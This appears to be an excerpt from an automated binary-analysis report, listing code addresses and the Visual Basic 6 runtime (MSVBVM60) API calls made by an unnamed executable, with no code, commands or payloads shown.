                                      0x0040f3ad
                                      0x0040f3b2
                                      0x0040f3b2
                                      0x0040f3c8
                                      0x0040f3e5
                                      0x0040f3ca
                                      0x0040f3ca
                                      0x0040f3cf
                                      0x0040f3d4
                                      0x0040f3d9
                                      0x0040f3d9
                                      0x0040f409
                                      0x0040f410
                                      0x0040f415
                                      0x0040f430
                                      0x0040f436
                                      0x0040f438
                                      0x0040f445
                                      0x0040f46a
                                      0x0040f447
                                      0x0040f447
                                      0x0040f44c
                                      0x0040f451
                                      0x0040f457
                                      0x0040f45d
                                      0x0040f462
                                      0x0040f462
                                      0x0040f478
                                      0x0040f495
                                      0x0040f47a
                                      0x0040f47a
                                      0x0040f47f
                                      0x0040f484
                                      0x0040f489
                                      0x0040f489
                                      0x0040f4b9
                                      0x0040f4c0
                                      0x0040f4c5
                                      0x0040f4e0
                                      0x0040f4e6
                                      0x0040f4e8
                                      0x0040f4f5
                                      0x0040f51a
                                      0x0040f4f7
                                      0x0040f4f7
                                      0x0040f4fc
                                      0x0040f501
                                      0x0040f507
                                      0x0040f50d
                                      0x0040f512
                                      0x0040f512
                                      0x0040f521
                                      0x0040f523
                                      0x0040f525
                                      0x0040f531
                                      0x0040f532
                                      0x0040f537
                                      0x0040f541
                                      0x0040f55e
                                      0x0040f543
                                      0x0040f543
                                      0x0040f548
                                      0x0040f54d
                                      0x0040f552
                                      0x0040f552
                                      0x0040f582
                                      0x0040f589
                                      0x0040f58e
                                      0x0040f5a9
                                      0x0040f5af
                                      0x0040f5b1
                                      0x0040f5be
                                      0x0040f5e3
                                      0x0040f5c0
                                      0x0040f5c0
                                      0x0040f5c5
                                      0x0040f5ca
                                      0x0040f5d0
                                      0x0040f5d6
                                      0x0040f5db
                                      0x0040f5db
                                      0x0040f5f1
                                      0x0040f60e
                                      0x0040f5f3
                                      0x0040f5f3
                                      0x0040f5f8
                                      0x0040f5fd
                                      0x0040f602
                                      0x0040f602
                                      0x0040f632
                                      0x0040f639
                                      0x0040f63e
                                      0x0040f659
                                      0x0040f65f
                                      0x0040f661
                                      0x0040f66e
                                      0x0040f693
                                      0x0040f670
                                      0x0040f670
                                      0x0040f675
                                      0x0040f67a
                                      0x0040f680
                                      0x0040f686
                                      0x0040f68b
                                      0x0040f68b
                                      0x0040f6a0
                                      0x0040f6a6
                                      0x0040f6b6
                                      0x0040f6bc
                                      0x0040f6c6
                                      0x0040f6d0
                                      0x0040f6da
                                      0x0040f6e4
                                      0x0040f702
                                      0x0040f709
                                      0x0040f713
                                      0x0040f723
                                      0x0040f730
                                      0x0040f731
                                      0x0040f732
                                      0x0040f733
                                      0x0040f74f
                                      0x0040f755
                                      0x0040f762
                                      0x0040f784
                                      0x0040f764
                                      0x0040f764
                                      0x0040f769
                                      0x0040f76e
                                      0x0040f771
                                      0x0040f777
                                      0x0040f77c
                                      0x0040f77c
                                      0x0040f792
                                      0x0040f799
                                      0x0040f7ce
                                      0x0040f7ed
                                      0x0040f7f2
                                      0x0040f7f5
                                      0x0040f80b
                                      0x0040f811
                                      0x0040f81e
                                      0x0040f840
                                      0x0040f820
                                      0x0040f820
                                      0x0040f825
                                      0x0040f82a
                                      0x0040f82d
                                      0x0040f833
                                      0x0040f838
                                      0x0040f838
                                      0x0040f84d
                                      0x0040f850
                                      0x0040f85e
                                      0x0040f87b
                                      0x0040f860
                                      0x0040f860
                                      0x0040f865
                                      0x0040f86a
                                      0x0040f86f
                                      0x0040f86f
                                      0x0040f89f
                                      0x0040f8a3
                                      0x0040f8a8
                                      0x0040f8c3
                                      0x0040f8c9
                                      0x0040f8cb
                                      0x0040f8d8
                                      0x0040f8fd
                                      0x0040f8da
                                      0x0040f8da
                                      0x0040f8df
                                      0x0040f8e4
                                      0x0040f8ea
                                      0x0040f8f0
                                      0x0040f8f5
                                      0x0040f8f5
                                      0x0040f90b
                                      0x0040f928
                                      0x0040f90d
                                      0x0040f90d
                                      0x0040f912
                                      0x0040f917
                                      0x0040f91c
                                      0x0040f91c
                                      0x0040f94c
                                      0x0040f953
                                      0x0040f958
                                      0x0040f973
                                      0x0040f979
                                      0x0040f97b
                                      0x0040f988
                                      0x0040f9ad
                                      0x0040f98a
                                      0x0040f98a
                                      0x0040f98f
                                      0x0040f994
                                      0x0040f99a
                                      0x0040f9a0
                                      0x0040f9a5
                                      0x0040f9a5
                                      0x0040f9bb
                                      0x0040f9d8
                                      0x0040f9bd
                                      0x0040f9bd
                                      0x0040f9c2
                                      0x0040f9c7
                                      0x0040f9cc
                                      0x0040f9cc
                                      0x0040f9fc
                                      0x0040fa03
                                      0x0040fa08
                                      0x0040fa20
                                      0x0040fa23
                                      0x0040fa25
                                      0x0040fa32
                                      0x0040fa54
                                      0x0040fa34
                                      0x0040fa34
                                      0x0040fa36
                                      0x0040fa3b
                                      0x0040fa41
                                      0x0040fa47
                                      0x0040fa4c
                                      0x0040fa4c
                                      0x0040fa5e
                                      0x0040fa64
                                      0x0040fa6e
                                      0x0040fa74
                                      0x0040fa85
                                      0x0040fa8f
                                      0x0040fa9c
                                      0x0040fa9d
                                      0x0040fa9e
                                      0x0040fa9f
                                      0x0040fab5
                                      0x0040fabb
                                      0x0040fac8
                                      0x0040faea
                                      0x0040faca
                                      0x0040faca
                                      0x0040facf
                                      0x0040fad4
                                      0x0040fad7
                                      0x0040fadd
                                      0x0040fae2
                                      0x0040fae2
                                      0x0040faf7
                                      0x0040fafe
                                      0x0040fb02
                                      0x0040fb03
                                      0x0040fb05
                                      0x0040fb0a
                                      0x0040fb13
                                      0x0040fb18
                                      0x0040fb26
                                      0x0040fb43
                                      0x0040fb28
                                      0x0040fb28
                                      0x0040fb2d
                                      0x0040fb32
                                      0x0040fb37
                                      0x0040fb37
                                      0x0040fb67
                                      0x0040fb6b
                                      0x0040fb70
                                      0x0040fb8b
                                      0x0040fb91
                                      0x0040fb93
                                      0x0040fba0
                                      0x0040fbc5
                                      0x0040fba2
                                      0x0040fba2
                                      0x0040fba7
                                      0x0040fbac
                                      0x0040fbb2
                                      0x0040fbb8
                                      0x0040fbbd
                                      0x0040fbbd
                                      0x0040fbd3
                                      0x0040fbf0
                                      0x0040fbd5
                                      0x0040fbd5
                                      0x0040fbda
                                      0x0040fbdf
                                      0x0040fbe4
                                      0x0040fbe4
                                      0x0040fc14
                                      0x0040fc1b
                                      0x0040fc20
                                      0x0040fc38
                                      0x0040fc3b
                                      0x0040fc3d
                                      0x0040fc4a
                                      0x0040fc6c
                                      0x0040fc4c
                                      0x0040fc4c
                                      0x0040fc4e
                                      0x0040fc53
                                      0x0040fc59
                                      0x0040fc5f
                                      0x0040fc64
                                      0x0040fc64
                                      0x0040fc7a
                                      0x0040fc97
                                      0x0040fc7c
                                      0x0040fc7c
                                      0x0040fc81
                                      0x0040fc86
                                      0x0040fc8b
                                      0x0040fc8b
                                      0x0040fcbb
                                      0x0040fcc2
                                      0x0040fcc7
                                      0x0040fce2
                                      0x0040fce5
                                      0x0040fce7
                                      0x0040fcf4
                                      0x0040fd16
                                      0x0040fcf6
                                      0x0040fcf6
                                      0x0040fcf8
                                      0x0040fcfd
                                      0x0040fd03
                                      0x0040fd09
                                      0x0040fd0e
                                      0x0040fd0e
                                      0x0040fd24
                                      0x0040fd41
                                      0x0040fd26
                                      0x0040fd26
                                      0x0040fd2b
                                      0x0040fd30
                                      0x0040fd35
                                      0x0040fd35
                                      0x0040fd65
                                      0x0040fd6c
                                      0x0040fd71
                                      0x0040fd8c
                                      0x0040fd92
                                      0x0040fd94
                                      0x0040fda1
                                      0x0040fdc6
                                      0x0040fda3
                                      0x0040fda3
                                      0x0040fda8
                                      0x0040fdad
                                      0x0040fdb3
                                      0x0040fdb9
                                      0x0040fdbe
                                      0x0040fdbe
                                      0x0040fdd4
                                      0x0040fdf1
                                      0x0040fdd6
                                      0x0040fdd6
                                      0x0040fddb
                                      0x0040fde0
                                      0x0040fde5
                                      0x0040fde5
                                      0x0040fe0b
                                      0x0040fe15
                                      0x0040fe1c
                                      0x0040fe21
                                      0x0040fe39
                                      0x0040fe3f
                                      0x0040fe41
                                      0x0040fe4e
                                      0x0040fe73
                                      0x0040fe50
                                      0x0040fe50
                                      0x0040fe55
                                      0x0040fe5a
                                      0x0040fe60
                                      0x0040fe66
                                      0x0040fe6b
                                      0x0040fe6b
                                      0x0040fe7d
                                      0x0040fe83
                                      0x0040fe8d
                                      0x0040fe93
                                      0x0040fea3
                                      0x0040fea9
                                      0x0040feb6
                                      0x0040febc
                                      0x0040fec6
                                      0x0040fed6
                                      0x0040fef7
                                      0x0040ff04
                                      0x0040ff05
                                      0x0040ff06
                                      0x0040ff07
                                      0x0040ff1d
                                      0x0040ff32
                                      0x0040ff38
                                      0x0040ff45
                                      0x0040ff67
                                      0x0040ff47
                                      0x0040ff47
                                      0x0040ff4c
                                      0x0040ff51
                                      0x0040ff54
                                      0x0040ff5a
                                      0x0040ff5f
                                      0x0040ff5f
                                      0x0040ff77
                                      0x0040ff7f
                                      0x0040ffa6
                                      0x0040ffbe
                                      0x0040ffc3
                                      0x0040ffc6
                                      0x0040ffd5
                                      0x0040fffc
                                      0x00410008
                                      0x0041000e
                                      0x00410013
                                      0x00410021
                                      0x0041003e
                                      0x00410023
                                      0x00410023
                                      0x00410028
                                      0x0041002d
                                      0x00410032
                                      0x00410032
                                      0x00410062
                                      0x00410066
                                      0x0041006b
                                      0x00410086
                                      0x0041008c
                                      0x0041008e
                                      0x0041009b
                                      0x004100c0
                                      0x0041009d
                                      0x0041009d
                                      0x004100a2
                                      0x004100a7
                                      0x004100ad
                                      0x004100b3
                                      0x004100b8
                                      0x004100b8
                                      0x004100c7
                                      0x004100c9
                                      0x004100cb
                                      0x004100d7
                                      0x004100d8
                                      0x004100dd
                                      0x004100e7
                                      0x00410104
                                      0x004100e9
                                      0x004100e9
                                      0x004100ee
                                      0x004100f3
                                      0x004100f8
                                      0x004100f8
                                      0x00410128
                                      0x0041012f
                                      0x00410134
                                      0x0041014f
                                      0x00410155
                                      0x00410157
                                      0x00410164
                                      0x00410189
                                      0x00410166
                                      0x00410166
                                      0x0041016b
                                      0x00410170
                                      0x00410176
                                      0x0041017c
                                      0x00410181
                                      0x00410181
                                      0x00410197
                                      0x004101b4
                                      0x00410199
                                      0x00410199
                                      0x0041019e
                                      0x004101a3
                                      0x004101a8
                                      0x004101a8
                                      0x004101d8
                                      0x004101df
                                      0x004101e4
                                      0x004101ff
                                      0x00410205
                                      0x00410207
                                      0x00410214
                                      0x00410239
                                      0x00410216
                                      0x00410216
                                      0x0041021b
                                      0x00410220
                                      0x00410226
                                      0x0041022c
                                      0x00410231
                                      0x00410231
                                      0x00410247
                                      0x00410264
                                      0x00410249
                                      0x00410249
                                      0x0041024e
                                      0x00410253
                                      0x00410258
                                      0x00410258
                                      0x00410288
                                      0x0041028f
                                      0x00410294
                                      0x004102af
                                      0x004102b2
                                      0x004102b4
                                      0x004102c1
                                      0x004102e3
                                      0x004102c3
                                      0x004102c3
                                      0x004102c5
                                      0x004102ca
                                      0x004102d0
                                      0x004102d6
                                      0x004102db
                                      0x004102db
                                      0x004102f1
                                      0x0041030e
                                      0x004102f3
                                      0x004102f3
                                      0x004102f8
                                      0x004102fd
                                      0x00410302
                                      0x00410302
                                      0x00410332
                                      0x00410339
                                      0x0041033e
                                      0x00410359
                                      0x0041035f
                                      0x00410361
                                      0x0041036e
                                      0x00410393
                                      0x00410370
                                      0x00410370
                                      0x00410375
                                      0x0041037a
                                      0x00410380
                                      0x00410386
                                      0x0041038b
                                      0x0041038b
                                      0x0041039a
                                      0x0041039c
                                      0x0041039e
                                      0x004103aa
                                      0x004103ab
                                      0x004103b0
                                      0x004103ba
                                      0x004103d7
                                      0x004103bc
                                      0x004103bc
                                      0x004103c1
                                      0x004103c6
                                      0x004103cb
                                      0x004103cb
                                      0x004103fb
                                      0x00410402
                                      0x00410407
                                      0x00410422
                                      0x00410428
                                      0x0041042a
                                      0x00410437
                                      0x0041045c
                                      0x00410439
                                      0x00410439
                                      0x0041043e
                                      0x00410443
                                      0x00410449
                                      0x0041044f
                                      0x00410454
                                      0x00410454
                                      0x0041046b
                                      0x00410477
                                      0x00410484
                                      0x0041048a
                                      0x00410491
                                      0x00410496
                                      0x004104a9
                                      0x004104b0
                                      0x004104f1
                                      0x00410500
                                      0x00410508
                                      0x00410513
                                      0x0041051a
                                      0x00410521
                                      0x00410528
                                      0x0041052f
                                      0x00410536
                                      0x0041053d
                                      0x00410541
                                      0x00410542
                                      0x00410544
                                      0x00410552
                                      0x00410559
                                      0x0041055a
                                      0x0041055c
                                      0x00410561
                                      0x00410564
                                      0x00410572
                                      0x0041058f
                                      0x00410574
                                      0x00410574
                                      0x00410579
                                      0x0041057e
                                      0x00410583
                                      0x00410583
                                      0x004105b3
                                      0x004105b7
                                      0x004105bc
                                      0x004105d7
                                      0x004105dd
                                      0x004105df
                                      0x004105ec
                                      0x00410611
                                      0x004105ee
                                      0x004105ee
                                      0x004105f3
                                      0x004105f8
                                      0x004105fe
                                      0x00410604
                                      0x00410609
                                      0x00410609
                                      0x0041061f
                                      0x0041063c
                                      0x00410621
                                      0x00410621
                                      0x00410626
                                      0x0041062b
                                      0x00410630
                                      0x00410630
                                      0x00410660
                                      0x00410667
                                      0x0041066c
                                      0x00410687
                                      0x0041068d
                                      0x0041068f
                                      0x0041069c
                                      0x004106c1
                                      0x0041069e
                                      0x0041069e
                                      0x004106a3
                                      0x004106a8
                                      0x004106ae
                                      0x004106b4
                                      0x004106b9
                                      0x004106b9
                                      0x004106cf
                                      0x004106ec
                                      0x004106d1
                                      0x004106d1
                                      0x004106d6
                                      0x004106db
                                      0x004106e0
                                      0x004106e0
                                      0x00410710
                                      0x00410717
                                      0x0041071c
                                      0x00410737
                                      0x0041073a
                                      0x0041073c
                                      0x00410749
                                      0x0041076b
                                      0x0041074b
                                      0x0041074b
                                      0x0041074d
                                      0x00410752
                                      0x00410758
                                      0x0041075e
                                      0x00410763
                                      0x00410763
                                      0x00410778
                                      0x0041077e
                                      0x00410788
                                      0x00410798
                                      0x004107a4
                                      0x004107aa
                                      0x004107b7
                                      0x004107bd
                                      0x004107ce
                                      0x004107d5
                                      0x004107df
                                      0x004107e9
                                      0x004107f3
                                      0x0041080e
                                      0x0041081b
                                      0x0041081c
                                      0x0041081d
                                      0x0041081e
                                      0x00410841
                                      0x0041084e
                                      0x0041084f
                                      0x00410850
                                      0x00410851
                                      0x00410855
                                      0x00410862
                                      0x00410863
                                      0x00410864
                                      0x00410865
                                      0x0041086e
                                      0x00410874
                                      0x00410881
                                      0x004108a3
                                      0x00410883
                                      0x00410883
                                      0x00410888
                                      0x0041088d
                                      0x00410890
                                      0x00410896
                                      0x0041089b
                                      0x0041089b
                                      0x004108b0
                                      0x004108b9
                                      0x004108c2
                                      0x004108c9
                                      0x004108cd
                                      0x004108ce
                                      0x004108d0
                                      0x004108d5
                                      0x004108de
                                      0x004108e3
                                      0x004108f1
                                      0x0041090e
                                      0x004108f3
                                      0x004108f3
                                      0x004108f8
                                      0x004108fd
                                      0x00410902
                                      0x00410902
                                      0x00410932
                                      0x00410936
                                      0x0041093b
                                      0x00410956
                                      0x0041095c
                                      0x0041095e
                                      0x0041096b
                                      0x00410990
                                      0x0041096d
                                      0x0041096d
                                      0x00410972
                                      0x00410977
                                      0x0041097d
                                      0x00410983
                                      0x00410988
                                      0x00410988
                                      0x0041099e
                                      0x004109bb
                                      0x004109a0
                                      0x004109a0
                                      0x004109a5
                                      0x004109aa
                                      0x004109af
                                      0x004109af
                                      0x004109d5
                                      0x004109df
                                      0x004109e6
                                      0x004109eb
                                      0x00410a06
                                      0x00410a0c
                                      0x00410a0e
                                      0x00410a1b
                                      0x00410a40
                                      0x00410a1d
                                      0x00410a1d
                                      0x00410a22
                                      0x00410a27
                                      0x00410a2d
                                      0x00410a33
                                      0x00410a38
                                      0x00410a38
                                      0x00410a47
                                      0x00410a50
                                      0x00410a59
                                      0x00410a63
                                      0x00410a96
                                      0x00410aa8
                                      0x00410aae
                                      0x00410abb
                                      0x00410add
                                      0x00410abd
                                      0x00410abd
                                      0x00410ac2
                                      0x00410ac7
                                      0x00410aca
                                      0x00410ad0
                                      0x00410ad5
                                      0x00410ad5
                                      0x00410aeb
                                      0x00410af5
                                      0x00410af9
                                      0x00410afa
                                      0x00410afc
                                      0x00410b01
                                      0x00410b0a
                                      0x00410b0f
                                      0x00410b1d
                                      0x00410b3a
                                      0x00410b1f
                                      0x00410b1f
                                      0x00410b24
                                      0x00410b29
                                      0x00410b2e
                                      0x00410b2e
                                      0x00410b5e
                                      0x00410b62
                                      0x00410b67
                                      0x00410b82
                                      0x00410b85
                                      0x00410b87
                                      0x00410b94
                                      0x00410bb6
                                      0x00410b96
                                      0x00410b96
                                      0x00410b98
                                      0x00410b9d
                                      0x00410ba3
                                      0x00410ba9
                                      0x00410bae
                                      0x00410bae
                                      0x00410bc4
                                      0x00410be1
                                      0x00410bc6
                                      0x00410bc6
                                      0x00410bcb
                                      0x00410bd0
                                      0x00410bd5
                                      0x00410bd5
                                      0x00410c05
                                      0x00410c0c
                                      0x00410c11
                                      0x00410c2c
                                      0x00410c2f
                                      0x00410c31
                                      0x00410c3e
                                      0x00410c60
                                      0x00410c40
                                      0x00410c40
                                      0x00410c42
                                      0x00410c47
                                      0x00410c4d
                                      0x00410c53
                                      0x00410c58
                                      0x00410c58
                                      0x00410c6d
                                      0x00410c73
                                      0x00410c83
                                      0x00410c8e
                                      0x00410c91
                                      0x00410cbc
                                      0x00410cc7
                                      0x00410ccd
                                      0x00410cda
                                      0x00410cfc
                                      0x00410cdc
                                      0x00410cdc
                                      0x00410ce1
                                      0x00410ce6
                                      0x00410ce9
                                      0x00410cef
                                      0x00410cf4
                                      0x00410cf4
                                      0x00410d06
                                      0x00410d18
                                      0x00410d20
                                      0x00410d29
                                      0x00410d2e
                                      0x00410d3d
                                      0x00410d43
                                      0x00410d45
                                      0x00410d52
                                      0x00410d74
                                      0x00410d54
                                      0x00410d54
                                      0x00410d59
                                      0x00410d5e
                                      0x00410d61
                                      0x00410d67
                                      0x00410d6c
                                      0x00410d6c
                                      0x00410d7b
                                      0x00410d7b
                                      0x00410d86
                                      0x00410d89
                                      0x00410d94
                                      0x00000000
                                      0x00000000
                                      0x00410d98
                                      0x00410d9a
                                      0x00410da1
                                      0x00410da6
                                      0x00410dad
                                      0x00410db4
                                      0x00410dbb
                                      0x00410dc2
                                      0x00410dcc
                                      0x00410dd9
                                      0x00410ddf
                                      0x00410de6
                                      0x00410de7
                                      0x00410e66
                                      0x00410e6e
                                      0x00410e73

                                      APIs
                                      • __vbaChkstk.MSVBVM60(?,004012E6), ref: 0040E7C8
                                      • #670.MSVBVM60(?,?,?,?,?,004012E6), ref: 0040E813
                                      • __vbaVarTstEq.MSVBVM60(00008008,?), ref: 0040E83A
                                      • __vbaFreeVar.MSVBVM60(00008008,?), ref: 0040E84C
                                      • __vbaNew2.MSVBVM60(00402B8C,00413010,00008008,?), ref: 0040E87A
                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040E8B3
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AC4,00000158), ref: 0040E8FD
                                      • #529.MSVBVM60(00000008), ref: 0040E93B
                                      • __vbaFreeObj.MSVBVM60(00000008), ref: 0040E943
                                      • __vbaFreeVar.MSVBVM60(00000008), ref: 0040E94E
                                      • __vbaChkstk.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00008008,?), ref: 0040E999
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403918,000006F8), ref: 0040E9ED
                                      • __vbaFreeVar.MSVBVM60(00000000,?,00403918,000006F8), ref: 0040EA07
                                      • __vbaNew2.MSVBVM60(00402B8C,00413010), ref: 0040EA4B
                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040EA84
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403AC4,00000078), ref: 0040EACB
                                      • __vbaNew2.MSVBVM60(00402B8C,00413010), ref: 0040EAF2
                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040EB2E
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AC4,00000130), ref: 0040EB7B
                                      • __vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 0040EBA0
                                      • __vbaNew2.MSVBVM60(00402B8C,00413010,?,?,?,004012E6), ref: 0040EBBB
                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040EBF7
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AC4,00000118), ref: 0040EC44
                                      • __vbaStrVarMove.MSVBVM60(?), ref: 0040EC75
                                      • __vbaStrMove.MSVBVM60(?), ref: 0040EC7F
                                      • __vbaVarDup.MSVBVM60(?), ref: 0040ECB0
                                      • __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,v6_,?,00007259,?), ref: 0040ED10
                                      • __vbaFreeObjList.MSVBVM60(00000004,?,?,?,?,?,?,?,?,?,?,v6_,?,00007259,?), ref: 0040ED30
                                      • __vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,?,?,?,?,?,004012E6), ref: 0040ED48
                                      • __vbaNew2.MSVBVM60(00402B8C,00413010,?,?,?,?,?,?,?,?,?,?,?,004012E6), ref: 0040ED6A
                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040EDA3
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AC4,000000F8), ref: 0040EDF0
                                      • __vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 0040EE15
                                      • __vbaNew2.MSVBVM60(00402B8C,00413010), ref: 0040EE30
                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040EE6C
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AC4,00000158), ref: 0040EEB6
                                      • __vbaNew2.MSVBVM60(00402B8C,00413010), ref: 0040EEDD
                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040EF19
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AC4,00000160), ref: 0040EF66
                                      • __vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 0040EF8B
                                      • __vbaNew2.MSVBVM60(00402B8C,00413010), ref: 0040EFA6
                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040EFE2
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AC4,00000158), ref: 0040F02C
                                      • __vbaNew2.MSVBVM60(00402B8C,00413010), ref: 0040F053
                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040F08F
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AC4,00000080), ref: 0040F0DC
                                      • __vbaStrMove.MSVBVM60(00000000,?,00403AC4,00000080), ref: 0040F11C
                                      • __vbaI4Var.MSVBVM60(?), ref: 0040F128
                                      • __vbaI4Var.MSVBVM60(?,?), ref: 0040F15D
                                      • __vbaChkstk.MSVBVM60(?,00000008,?,?,00084AC3,?,?,?), ref: 0040F1A6
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403918,000006FC), ref: 0040F1F6
                                      • __vbaFreeStr.MSVBVM60(00000000,?,00403918,000006FC), ref: 0040F20D
                                      • __vbaFreeObjList.MSVBVM60(00000007,?,?,?,?,?,?,?), ref: 0040F242
                                      • __vbaFreeVarList.MSVBVM60(00000003,?,?,?), ref: 0040F261
                                      • __vbaNew2.MSVBVM60(00402B8C,00413010), ref: 0040F283
                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040F2BC
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AC4,00000060), ref: 0040F303
                                      • __vbaNew2.MSVBVM60(00402B8C,00413010), ref: 0040F32A
                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040F366
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AC4,00000060), ref: 0040F3AD
                                      • __vbaNew2.MSVBVM60(00402B8C,00413010), ref: 0040F3D4
                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040F410
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AC4,00000138), ref: 0040F45D
                                      • __vbaNew2.MSVBVM60(00402B8C,00413010), ref: 0040F484
                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040F4C0
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AC4,00000130), ref: 0040F50D
                                      • __vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 0040F532
                                      • __vbaNew2.MSVBVM60(00402B8C,00413010), ref: 0040F54D
                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040F589
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AC4,00000118), ref: 0040F5D6
                                      • __vbaNew2.MSVBVM60(00402B8C,00413010), ref: 0040F5FD
                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040F639
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AC4,00000178), ref: 0040F686
                                      • __vbaStrVarMove.MSVBVM60(?,00000003,?,?), ref: 0040F709
                                      • __vbaStrMove.MSVBVM60(?,00000003,?,?), ref: 0040F713
                                      • __vbaChkstk.MSVBVM60(00000003,00000000,?,00000003,?,?), ref: 0040F723
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403918,00000700), ref: 0040F777
                                      • __vbaFreeStr.MSVBVM60(00000000,?,00403918,00000700), ref: 0040F799
                                      • __vbaFreeObjList.MSVBVM60(00000007,?,?,?,?,?,?,?), ref: 0040F7CE
                                      • __vbaFreeVarList.MSVBVM60(00000003,00000003,?,?), ref: 0040F7ED
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403918,00000704), ref: 0040F833
                                      • __vbaNew2.MSVBVM60(00402B8C,00413010), ref: 0040F86A
                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040F8A3
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403AC4,00000188), ref: 0040F8F0
                                      • __vbaNew2.MSVBVM60(00402B8C,00413010), ref: 0040F917
                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040F953
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AC4,00000140), ref: 0040F9A0
                                      • __vbaNew2.MSVBVM60(00402B8C,00413010), ref: 0040F9C7
                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040FA03
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AC4,00000050), ref: 0040FA47
                                      • __vbaChkstk.MSVBVM60(00000000,?,00403AC4,00000050), ref: 0040FA8F
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403918,00000708), ref: 0040FADD
                                      • __vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 0040FB05
                                      • __vbaFreeVar.MSVBVM60 ref: 0040FB13
                                      • __vbaNew2.MSVBVM60(00402B8C,00413010), ref: 0040FB32
                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040FB6B
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AC4,00000188), ref: 0040FBB8
                                      • __vbaNew2.MSVBVM60(00402B8C,00413010), ref: 0040FBDF
                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040FC1B
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AC4,00000048), ref: 0040FC5F
                                      • __vbaNew2.MSVBVM60(00402B8C,00413010), ref: 0040FC86
                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040FCC2
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AC4,00000068), ref: 0040FD09
                                      • __vbaNew2.MSVBVM60(00402B8C,00413010), ref: 0040FD30
                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040FD6C
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AC4,00000130), ref: 0040FDB9
                                      • __vbaNew2.MSVBVM60(00402B8C,00413010), ref: 0040FDE0
                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040FE1C
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AC4,00000108), ref: 0040FE66
                                      • __vbaChkstk.MSVBVM60(00000008,F0230230,00005AFA,?), ref: 0040FEF7
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403918,0000070C,?,?,?,0024158F,00000008,F0230230,00005AFA,?), ref: 0040FF5A
                                      • __vbaVarMove.MSVBVM60(?,?,?,0024158F,00000008,F0230230,00005AFA,?), ref: 0040FF77
                                      • __vbaFreeStr.MSVBVM60(?,?,?,0024158F,00000008,F0230230,00005AFA,?), ref: 0040FF7F
                                      • __vbaFreeObjList.MSVBVM60(00000005,?,?,?,?,?,?,?,?,0024158F,00000008,F0230230,00005AFA,?), ref: 0040FFA6
                                      • __vbaFreeVarList.MSVBVM60(00000002,00000009,00000008), ref: 0040FFBE
                                      • __vbaStrCopy.MSVBVM60 ref: 0040FFD5
                                      • __vbaFreeStr.MSVBVM60 ref: 0041000E
                                      • __vbaNew2.MSVBVM60(00402B8C,00413010), ref: 0041002D
                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 00410066
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AC4,000000F8), ref: 004100B3
                                      • __vbaLateIdCallLd.MSVBVM60(00000009,?,00000000,00000000), ref: 004100D8
                                      • __vbaNew2.MSVBVM60(00402B8C,00413010), ref: 004100F3
                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041012F
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AC4,00000118), ref: 0041017C
                                      • __vbaNew2.MSVBVM60(00402B8C,00413010), ref: 004101A3
